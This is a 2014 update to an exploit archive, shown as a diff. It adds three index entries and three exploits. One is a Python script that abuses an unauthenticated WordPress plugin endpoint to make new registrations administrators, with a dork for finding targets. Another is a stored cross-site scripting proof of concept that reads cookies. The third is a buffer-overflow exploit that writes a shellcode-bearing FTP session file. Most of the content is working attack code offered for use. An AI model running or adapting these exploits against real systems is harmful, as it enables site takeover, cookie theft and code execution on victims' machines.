Updated 09_07_2014

files.csv

@@ -31104,3 +31104,6 @@ id,file,description,date,author,platform,type,port
 34534,platforms/php/webapps/34534.txt,"TCMS Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
 34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
 34536,platforms/php/webapps/34536.txt,"CompuCMS Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
+34538,platforms/php/webapps/34538.txt,"Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability",2014-09-05,Hannaichi,php,webapps,80
+34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Stored XSS",2014-09-05,"Fikri Fadzil",php,webapps,80
+34540,platforms/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit",2014-09-05,"Robert Kugler",windows,dos,0

platforms/php/webapps/34538.txt

@@ -0,0 +1,43 @@
+#Exploit Title : Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability
+#Author : Hannaichi [@dntkun]
+#Date : February 5th, 2014
+#Type : php, html, htm, asp, etc.
+#Category : Web Applications
+#Vulnerability : Unauthenticated Configuration Access
+#Tested On : Windows 7 32-bit | Google Chrome 
+
+#Dork : inurl:/wp-content/plugins/premium_gallery_manager/ | USE YOUR BRAIN =))
+
+#Exploit : http://victim/[PATH]/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php
+
+#POC : 
+Save File As Python (.py) = 
+import httplib, urllib
+
+#target site
+site = "victim" #<--- no http:// or https://
+#path to ajax.php
+url = "/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php"
+
+def ChangeOption(site, url, option_name, option_value):
+    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
+    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
+    conn = httplib.HTTPConnection(site)
+    conn.request("POST", url, params, headers)
+    response = conn.getresponse()
+    print response.status, response.reason
+    data = response.read()
+    print data
+    conn.close()
+     
+ChangeOption(site, url, "admin_email", "youremail@test.com")
+ChangeOption(site, url, "users_can_register", "1")
+ChangeOption(site, url, "default_role", "administrator")
+print "Now register a new user, they are an administrator by default!"
+
+
+#Place It Broo No Lazy For This :D !!
+
+--------------------------------------------------------------------------------------------------------------------
+
+Thanks to: #AnonSec Hackers - Borneo Security - Bekantan Crew - Indonesian Hacker - Muslim Hacker - You :*

platforms/php/webapps/34539.txt

@@ -0,0 +1,30 @@
+# Exploit Title: User Social Networks MyBB Plugin 1.2 - Cross Site Scripting
+# Google Dork: N/A
+# Date: 05.09.2014
+# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
+# Vendor Homepage - N/A
+# Software Link: http://mods.mybb.com/view/user-social-networks
+# Version: 1.2
+# Tested on: PHP
+
+
+Description:
+This plugin allows you to add social networks, or related, in user
+profiles. The information will be shown in a user profile and visible for
+anyone who view the profile.
+
+Proof of Concept
+1. Login into your account.
+2. Go to "Edit Profile" page at "/usercp.php?action=profile"
+3. Update your Social Network ID with
+"><script>alert(document.cookie)</script><"
+4. The result can be seen in multiple places, including your profile page.
+
+* The script will be executed whenever anyone view your profile.
+** The result can also be seen in threads you involve IF the administrator
+configure this plugin to allow user's social sites information to be
+published in every post.
+
+Solution:
+Replace the content of "inc/plugins/usersocial.php" with this fix:
+http://pastebin.com/T1WgcwDB

platforms/windows/dos/34540.py

@@ -0,0 +1,37 @@
+# !/usr/bin/python
+#-----------------------------------------------------------------------------#
+# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit  #
+# Date: Sep 05 2014							      							  #
+# Vulnerability Discovery: Gabor Seljan                                       #
+# Exploit Author: Robert Kugler                                               #
+# Software Link: http://www.bpftp.com/                                        #
+# Version: 2010.75.0.76                                                       #
+# Tested on: Windows XP                                                       #
+# CVE: CVE-2014-2973 							      						  #
+#                                                         		      		  #
+# Thanks to corelanc0d3r for his awesome tutorials and help! ;-)	          #
+# The "Enter URL" form is also vulnerable	      			                  #
+#-----------------------------------------------------------------------------#
+
+buffer = "This is a BulletProof FTP Client Session-File and should not be modified directly.\n"
+buffer+= "\x20" + "\x90" * 89
+buffer+= "\xeb\x06\x90\x90"
+buffer+= "\xA0\xB3\x3C\x77" # shell32.dll pop pop ret @773CB3A0
+buffer+= "\x90" * 119 # 160 characters space
+buffer+= ("\x33\xc0\x50\x68"
+         "\x2E\x65\x78\x65"
+         "\x68\x63\x61\x6C"
+         "\x63\x8B\xC4\x6A" # 36 bytes
+         "\x01\x50\xBB\x35" # ExitProcess is located at 0x77e598fd in kernel32.dll
+         "\xfd\xe4\x77\xFF"
+         "\xD3\x33\xc0\x50"
+	 "\xc7\xc0\x8f\x4a"
+	 "\xe5\x77\xff\xe0")
+
+buffer+= "\x90" * (1000 - len(buffer))
+
+# Just load the "BP Session" and click on "Connect".
+
+file = open("ftpsession.bps","w")
+file.write(buffer)
+file.close()